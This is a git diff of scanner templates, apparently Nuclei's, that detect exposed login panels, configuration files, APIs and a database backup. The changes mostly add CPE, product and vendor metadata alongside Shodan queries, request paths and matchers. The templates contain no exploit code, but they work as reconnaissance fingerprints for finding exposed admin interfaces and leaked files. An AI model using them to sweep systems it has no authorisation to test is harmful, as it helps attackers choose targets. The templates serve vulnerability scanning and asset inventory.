http.title:"Verizon Router" + product: fios_actiontec_mi424wr-gen31_router_firmware + vendor: verizon tags: panel,verizon,router http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220237b1656f808e44a5030bbe4d9fee58af6bd5b64ca6516f855317caf65825a9502207afd9a73a7b6cb86f4d5950faccf3d9b369d9a3a7ed28e7a1f43d08fa7da072f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220237b1656f808e44a5030bbe4d9fee58af6bd5b64ca6516f855317caf65825a9502207afd9a73a7b6cb86f4d5950faccf3d9b369d9a3a7ed28e7a1f43d08fa7da072f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/versa/versa-director-login.yaml b/http/exposed-panels/versa/versa-director-login.yaml index 9846c9296d..3f0f596181 100644 --- a/http/exposed-panels/versa/versa-director-login.yaml +++ b/http/exposed-panels/versa/versa-director-login.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:versa-networks:versa_director:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"VERSA DIRECTOR Login" + product: versa_director + vendor: versa-networks tags: panel,versa,director http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203e4338991c5e73563655df86e8b660023b3de9a123761bb7227004cf71955933022100b24d1a7239a17f35123d9b064a8ff60afbd4bba902cb7aff4ab388402e39a0ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e4338991c5e73563655df86e8b660023b3de9a123761bb7227004cf71955933022100b24d1a7239a17f35123d9b064a8ff60afbd4bba902cb7aff4ab388402e39a0ac:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/vidyo-login.yaml b/http/exposed-panels/vidyo-login.yaml index d6a8da174b..2d1ddfb4e7 100644 --- a/http/exposed-panels/vidyo-login.yaml +++ b/http/exposed-panels/vidyo-login.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:vidyo:vidyo:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:-1970367401 + product: vidyo + vendor: vidyo tags: panel,vidyo http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220659be3b04924baabc3553241d41100ace7f7e823cd0cca6c325b5a72209030db022070985761295ba76d96d9df65544b7d2e6ea9dbdaaffb6fee9a08d17d5565394f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220659be3b04924baabc3553241d41100ace7f7e823cd0cca6c325b5a72209030db022070985761295ba76d96d9df65544b7d2e6ea9dbdaaffb6fee9a08d17d5565394f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/vinchin-panel.yaml b/http/exposed-panels/vinchin-panel.yaml index 44dbe15e06..db49faaed1 100644 --- a/http/exposed-panels/vinchin-panel.yaml +++ b/http/exposed-panels/vinchin-panel.yaml @@ -7,10 +7,13 @@ info: description: Vinchin Backup & Recovery login panel was detected. classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:vinchin:vinchin_backup_and_recovery:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"VinChin" + product: vinchin_backup_and_recovery + vendor: vinchin tags: panel,vinchin,login http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c5d94e57894fb3a772de21cfcd10427cf1340272e35a05071eab9c6ffe7c8620221008e2233363c9d137d624fbcd893c9abe879d52dee0d2281cfb04887a90ff101ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c5d94e57894fb3a772de21cfcd10427cf1340272e35a05071eab9c6ffe7c8620221008e2233363c9d137d624fbcd893c9abe879d52dee0d2281cfb04887a90ff101ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/vmware-cloud-availability.yaml b/http/exposed-panels/vmware-cloud-availability.yaml index 4b0cd225b7..77e5352e15 100644 --- a/http/exposed-panels/vmware-cloud-availability.yaml +++ b/http/exposed-panels/vmware-cloud-availability.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:vmware:cloud_director:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"VMware Cloud Director Availability" + product: cloud_director + vendor: vmware tags: panel,vmware http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220557a618a6f03f0b48a17f7de885f5eb5df6d600d773f2e9b9f83ab3f0160b7fa02201e54bba1fdda2a2078990955fbf76446e3824f6ee22cfcf2993187b8a7a3a007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220557a618a6f03f0b48a17f7de885f5eb5df6d600d773f2e9b9f83ab3f0160b7fa02201e54bba1fdda2a2078990955fbf76446e3824f6ee22cfcf2993187b8a7a3a007:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/vmware-hcx-login.yaml b/http/exposed-panels/vmware-hcx-login.yaml index 1c3b434879..fb4fe981ed 100644 --- a/http/exposed-panels/vmware-hcx-login.yaml +++ b/http/exposed-panels/vmware-hcx-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:vmware:vmware_hcx:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"VMware HCX" + product: vmware_hcx + vendor: vmware tags: panel,vmware http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022005b6b061e5e849c7620466600434c65ed30a11bb71d5f55d3ddab89f53cd9d9e02203fa286a08dde12b7447c28145786eeaf1880f7e7912507bab1fa6dac5fdb90bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005b6b061e5e849c7620466600434c65ed30a11bb71d5f55d3ddab89f53cd9d9e02203fa286a08dde12b7447c28145786eeaf1880f7e7912507bab1fa6dac5fdb90bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/vmware-nsx-login.yaml b/http/exposed-panels/vmware-nsx-login.yaml index ebe97b3426..28a5057525 100644 --- a/http/exposed-panels/vmware-nsx-login.yaml +++ b/http/exposed-panels/vmware-nsx-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:vmware:nsx-t_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png" + product: nsx-t_data_center + vendor: vmware tags: panel,vmware http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c41f036285efe6fe57dc13649d712eb81a01b9abeade1c1831ebbfd373e87a88022100a2c02e36a978df43bcef2d92ad4ed25338f3e785ce254e20aa5de35cfcef56b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c41f036285efe6fe57dc13649d712eb81a01b9abeade1c1831ebbfd373e87a88022100a2c02e36a978df43bcef2d92ad4ed25338f3e785ce254e20aa5de35cfcef56b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index 39d213a994..26f827f86e 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -9,10 +9,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:vmware:hyperic_hq:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Sign In - Hyperic" + product: hyperic_hq + vendor: vmware tags: login,panel,vrealize,hyperic,detect http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206fbf5a90bc0ea990171212b454ce657bff2b79cb0e2c4473be28d8b330d410150220495745350f17a240b57809e2ed71db324b465e69f2b2d8b2ea467dd46f8ff202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206fbf5a90bc0ea990171212b454ce657bff2b79cb0e2c4473be28d8b330d410150220495745350f17a240b57809e2ed71db324b465e69f2b2d8b2ea467dd46f8ff202:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/wallix-accessmanager-panel.yaml b/http/exposed-panels/wallix-accessmanager-panel.yaml index 1e18d62f57..7f67228ad3 100644 --- a/http/exposed-panels/wallix-accessmanager-panel.yaml +++ b/http/exposed-panels/wallix-accessmanager-panel.yaml @@ -10,9 +10,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:wallix:bastion_access_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"Wallix Access Manager" + product: bastion_access_manager + vendor: wallix tags: panel,wallix http: @@ -38,4 +41,4 @@ http: - "status_code==200" - "('1745235488' == mmh3(base64_py(body)))" condition: and -# digest: 490a00463044022019f1986330c602f5bc507701cc74ceebf5676bf1b40868b4ef45325740c5b24702201e76cf52ae8e567c34688463f12ad9828438e745cb79915d806733f2e3cc646d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022019f1986330c602f5bc507701cc74ceebf5676bf1b40868b4ef45325740c5b24702201e76cf52ae8e567c34688463f12ad9828438e745cb79915d806733f2e3cc646d:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/wampserver-homepage.yaml b/http/exposed-panels/wampserver-homepage.yaml index 8dbfceac2c..d40d0ece59 100644 --- a/http/exposed-panels/wampserver-homepage.yaml +++ b/http/exposed-panels/wampserver-homepage.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:wampserver:wampserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"WAMPSERVER Homepage" + product: wampserver + vendor: wampserver tags: panel,wampserver http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200e876eabfeebc6a773c72c74753efaa890720ce1ec2ea16d9bec0ff1e8abb8ea0221009c55c5af6fbb99a39eaffbe0f5ef95a5969904bd36894546aeeeec3cd4955d09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200e876eabfeebc6a773c72c74753efaa890720ce1ec2ea16d9bec0ff1e8abb8ea0221009c55c5af6fbb99a39eaffbe0f5ef95a5969904bd36894546aeeeec3cd4955d09:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/web-file-manager.yaml b/http/exposed-panels/web-file-manager.yaml index 9b9c0179f5..d780455389 100644 --- a/http/exposed-panels/web-file-manager.yaml +++ b/http/exposed-panels/web-file-manager.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Web File Manager" + product: file_manager + vendor: webdesi9 tags: panel,filemanager http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e778a238f0064436971445b186bf6231861a470b921a3bd2df0e435ecca79ac02204ad79a23e5edcc5bcc030dd71520b8228b29035f4ac20ce806cde800c6f3ffdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e778a238f0064436971445b186bf6231861a470b921a3bd2df0e435ecca79ac02204ad79a23e5edcc5bcc030dd71520b8228b29035f4ac20ce806cde800c6f3ffdc:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/webpagetest-panel.yaml b/http/exposed-panels/webpagetest-panel.yaml index 43d88dc0c2..f13f1c04e6 100644 --- a/http/exposed-panels/webpagetest-panel.yaml +++ b/http/exposed-panels/webpagetest-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:webpagetest:webpagetest:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"WebPageTest" + product: webpagetest + vendor: webpagetest tags: panel,webpagetest http: @@ -22,4 +25,4 @@ http: - type: word words: - 'WebPageTest - Website Performance and Optimization Test' -# digest: 4a0a0047304502201a06c0ddee59c8807ca1a89bb903953493a4aca51a33f01b88a078041c7b2b63022100983799328f61a8d31014324517303545678d703d1d2a559362ed0f036134c78a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a06c0ddee59c8807ca1a89bb903953493a4aca51a33f01b88a078041c7b2b63022100983799328f61a8d31014324517303545678d703d1d2a559362ed0f036134c78a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/webroot-login.yaml b/http/exposed-panels/webroot-login.yaml index 471257f9b6..64c37a39c9 100644 --- a/http/exposed-panels/webroot-login.yaml +++ b/http/exposed-panels/webroot-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:webroot:secureanywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Webroot - Login" + product: secureanywhere + vendor: webroot tags: panel,webroot http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008952e3b8a256fc0e76f8d3ab5759993245be82dfea19ae5b69304500c2502467022100ffb1c062d10d25d7d0eea58c00dd3394f0165fd0a159c12f5c0bb83fad110f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008952e3b8a256fc0e76f8d3ab5759993245be82dfea19ae5b69304500c2502467022100ffb1c062d10d25d7d0eea58c00dd3394f0165fd0a159c12f5c0bb83fad110f63:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/webtransfer-client-panel.yaml b/http/exposed-panels/webtransfer-client-panel.yaml index da3614f770..f3f558b4f5 100644 --- a/http/exposed-panels/webtransfer-client-panel.yaml +++ b/http/exposed-panels/webtransfer-client-panel.yaml @@ -1,5 +1,5 @@ -id: webtransfer-client-panel - +id: webtransfer-client-panel + info: name: Web Transfer Client Login Panel - Detect author: righettod @@ -11,17 +11,21 @@ info: verified: true max-request: 1 shodan-query: http.title:"Web Transfer Client" + product: moveit_transfer + vendor: progress tags: panel,webtransferclient,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/ThinClient/WTM/public/index.html" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "<title>Web Transfer Client")' + classification: + cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/ThinClient/WTM/public/index.html" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "<title>Web Transfer Client")' condition: and -# digest: 490a0046304402203f970565705761cadb9a73e16c172152e3d5df14dea54d907dc07a22563942dc022043f589d0a0b055c65bba328a1cdaecff4b7bbf11cd6eda05974f81a7b73ce2d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f970565705761cadb9a73e16c172152e3d5df14dea54d907dc07a22563942dc022043f589d0a0b055c65bba328a1cdaecff4b7bbf11cd6eda05974f81a7b73ce2d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/whatsup-gold-panel.yaml b/http/exposed-panels/whatsup-gold-panel.yaml index 94a4d51a92..ef441bf024 100644 --- a/http/exposed-panels/whatsup-gold-panel.yaml +++ b/http/exposed-panels/whatsup-gold-panel.yaml @@ -1,37 +1,41 @@ -id: whatsup-gold-panel - -info: - name: Whatsup Gold Login Panel - Detect - author: rxerium - severity: info - description: | - Whatsup Gold login panel was detected. - reference: - - https://www.whatsupgold.com/ - metadata: - verified: true - max-request: 2 - shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 - tags: panel,whatsup-gold,detect - -http: - - method: GET - path: - - '{{BaseURL}}/NmConsole' - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<title>WhatsUp Gold" - - - type: status - status: +id: whatsup-gold-panel + +info: + name: Whatsup Gold Login Panel - Detect + author: rxerium + severity: info + description: | + Whatsup Gold login panel was detected. + reference: + - https://www.whatsupgold.com/ + metadata: + verified: true + max-request: 2 + shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 + product: whatsup_gold + vendor: progress + tags: panel,whatsup-gold,detect + + classification: + cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - '{{BaseURL}}/NmConsole' + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "WhatsUp Gold" + + - type: status + status: - 200 -# digest: 4b0a00483046022100c67d4d7d5825640001925f3e039e7ae1afc956413d37374cc707593dff032a55022100e0f879d303c42e500a96ef5b3437d1b37bb53c49429315c4258dc289ce400844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c67d4d7d5825640001925f3e039e7ae1afc956413d37374cc707593dff032a55022100e0f879d303c42e500a96ef5b3437d1b37bb53c49429315c4258dc289ce400844:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/xiaomi-wireless-router-login.yaml b/http/exposed-panels/xiaomi-wireless-router-login.yaml index a5f21b5c4f..f884181970 100644 --- a/http/exposed-panels/xiaomi-wireless-router-login.yaml +++ b/http/exposed-panels/xiaomi-wireless-router-login.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:mi:xiaomi_router_ax3200:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"小米路由器" zoomeye-query: title:'小米路由器' + product: xiaomi_router_ax3200 + vendor: mi tags: panel,xiaomi http: @@ -34,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022049e5aa6b1fd4d7d5a4104e5caab70a86375eeac0e2c5660491af599aec36e719022020a3ccfaad8fe1fb9c838a9890d64d85b2aa81b12e7ac39053ccefbbe652f778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049e5aa6b1fd4d7d5a4104e5caab70a86375eeac0e2c5660491af599aec36e719022020a3ccfaad8fe1fb9c838a9890d64d85b2aa81b12e7ac39053ccefbbe652f778:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/xibocms-login.yaml b/http/exposed-panels/xibocms-login.yaml index dd6ed2e367..6e6f3da6ae 100644 --- a/http/exposed-panels/xibocms-login.yaml +++ b/http/exposed-panels/xibocms-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:springsignage:xibo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"/xibosignage/xibo-cms" + product: xibo + vendor: springsignage tags: panel,xibocms http: @@ -38,4 +41,4 @@ http: group: 1 regex: - '([0-9.]+) | (.+)<\/font><\/div>' -# digest: 4a0a00473045022100b4cdc3066c0c93867efd94dab67195e24a2b0d29611cc8fda850361e4f7d1d0502207c9f22243f4db8603716b56ceaf3c1038daf8cb3ac16a4fab97ccdc2fdbd51f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b4cdc3066c0c93867efd94dab67195e24a2b0d29611cc8fda850361e4f7d1d0502207c9f22243f4db8603716b56ceaf3c1038daf8cb3ac16a4fab97ccdc2fdbd51f1:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/zuul-panel.yaml b/http/exposed-panels/zuul-panel.yaml index 7ab1aff7c6..6384caa486 100644 --- a/http/exposed-panels/zuul-panel.yaml +++ b/http/exposed-panels/zuul-panel.yaml @@ -10,9 +10,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:zuul-ci:zuul:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:-1127895693 + product: zuul + vendor: zuul-ci tags: panel,zuul,cicd,oss http: @@ -38,4 +41,4 @@ http: - type: word words: - 'zuul_version' -# digest: 4a0a00473045022016602c96c9b62aa69d6fb4911f688fe1fff45eec2540d95e8dc0197643c31ac0022100c3c6239c7e5a9127e5d050399a8593dd46a0d418e055c34dfc9f482f6bcd55c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016602c96c9b62aa69d6fb4911f688fe1fff45eec2540d95e8dc0197643c31ac0022100c3c6239c7e5a9127e5d050399a8593dd46a0d418e055c34dfc9f482f6bcd55c9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml index b313fcccdf..78ccae6b5c 100644 --- a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml +++ b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:zyxel:zywall_vpn50_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-440644339 + product: zywall_vpn50_firmware + vendor: zyxel tags: panel,xyxel,firewall http: @@ -40,4 +43,4 @@ http: group: 1 regex: - "(.*)" -# digest: 4a0a0047304502205b5da4ba903870026fa76f29846b6d58ba5907d338394e7e79cf32181823a90f022100940a9f92b2a3f18f2766da0b153e1c16138db451b707531ebcde75614c5b019e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b5da4ba903870026fa76f29846b6d58ba5907d338394e7e79cf32181823a90f022100940a9f92b2a3f18f2766da0b153e1c16138db451b707531ebcde75614c5b019e:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/apis/jeecg-boot-swagger.yaml b/http/exposures/apis/jeecg-boot-swagger.yaml index 390c374fdb..16f509eaad 100644 --- a/http/exposures/apis/jeecg-boot-swagger.yaml +++ b/http/exposures/apis/jeecg-boot-swagger.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" + product: jeecg-boot + vendor: jeecg tags: jeecg,swagger,detect,exposure + classification: + cpe: cpe:2.3:a:jeecg:jeecg-boot:*:*:*:*:*:*:*:* http: - method: GET path: @@ -22,4 +26,4 @@ http: part: body words: - "Swagger-Bootstrap-UI" -# digest: 4a0a004730450220399772c6fac159e018e26aec89d85d94a9df282c1213c027e08db8b7e2f0169a022100e5952c927f759d37af355d775a184c33c49feb8ac669322d647f24700fe5d4fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220399772c6fac159e018e26aec89d85d94a9df282c1213c027e08db8b7e2f0169a022100e5952c927f759d37af355d775a184c33c49feb8ac669322d647f24700fe5d4fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml index 6720c62a6f..615aea7991 100644 --- a/http/exposures/apis/seafile-api.yaml +++ b/http/exposures/apis/seafile-api.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"seafile" + product: seafile + vendor: seafile tags: exposure,api,detect + classification: + cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/apis/strapi-page.yaml b/http/exposures/apis/strapi-page.yaml index 61d38c09b8..b38c230722 100644 --- a/http/exposures/apis/strapi-page.yaml +++ b/http/exposures/apis/strapi-page.yaml @@ -10,9 +10,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Welcome to your Strapi app" + product: strapi + vendor: strapi tags: api,strapi,exposure http: diff --git a/http/exposures/backups/froxlor-database-backup.yaml b/http/exposures/backups/froxlor-database-backup.yaml index 0c6944ce05..0e02db32e0 100644 --- a/http/exposures/backups/froxlor-database-backup.yaml +++ b/http/exposures/backups/froxlor-database-backup.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Froxlor Server Management Panel" + product: froxlor + vendor: froxlor tags: froxlor,backup,exposure,disclosure http: diff --git a/http/exposures/configs/accueil-wampserver.yaml b/http/exposures/configs/accueil-wampserver.yaml index 33dc824df7..ba9a58f1be 100644 --- a/http/exposures/configs/accueil-wampserver.yaml +++ b/http/exposures/configs/accueil-wampserver.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:wampserver:wampserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Accueil WAMPSERVER" + product: wampserver + vendor: wampserver tags: exposure,accueil,wampserver,config http: diff --git a/http/exposures/configs/babel-config-exposure.yaml b/http/exposures/configs/babel-config-exposure.yaml index 3bf2539e5f..8f8bdefca8 100644 --- a/http/exposures/configs/babel-config-exposure.yaml +++ b/http/exposures/configs/babel-config-exposure.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:pocoo:babel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"babel.config.js" + product: babel + vendor: pocoo tags: exposure,config,file http: diff --git a/http/exposures/configs/cakephp-config.yaml b/http/exposures/configs/cakephp-config.yaml index 65b2664b47..f3887626df 100644 --- a/http/exposures/configs/cakephp-config.yaml +++ b/http/exposures/configs/cakephp-config.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"phinx.yml" + product: cakephp + vendor: cakephp tags: files,exposure,config http: @@ -39,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220174e7b56d757ddb7d9ac26c557c04492c7b48a1af990970c8b1be5a74a6755a602210093f0838189c77f10640775dcf7d86e66d79c9bcf41fcaf9408b0fd0c49f4a22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220174e7b56d757ddb7d9ac26c557c04492c7b48a1af990970c8b1be5a74a6755a602210093f0838189c77f10640775dcf7d86e66d79c9bcf41fcaf9408b0fd0c49f4a22c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/configs/codeception-config.yaml b/http/exposures/configs/codeception-config.yaml index e34fdda448..437ec7eb56 100644 --- a/http/exposures/configs/codeception-config.yaml +++ b/http/exposures/configs/codeception-config.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"codeception.yml" + product: codeception + vendor: codeception tags: exposure,devops,codeception,config,cicd + classification: + cpe: cpe:2.3:a:codeception:codeception:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/configs/dompdf-config.yaml b/http/exposures/configs/dompdf-config.yaml index 5cf2e3c574..b61015d072 100644 --- a/http/exposures/configs/dompdf-config.yaml +++ b/http/exposures/configs/dompdf-config.yaml @@ -8,10 +8,13 @@ info: DOMPDF Configuration page was detected, which contains paths, library versions and other potentially sensitive information classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:dompdf_project:dompdf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 fofa-query: title="dompdf - The PHP 5 HTML to PDF Converter" + product: dompdf + vendor: dompdf_project tags: config,exposure,dompdf http: @@ -37,4 +40,4 @@ http: - type: status status: - 200 -# digest: 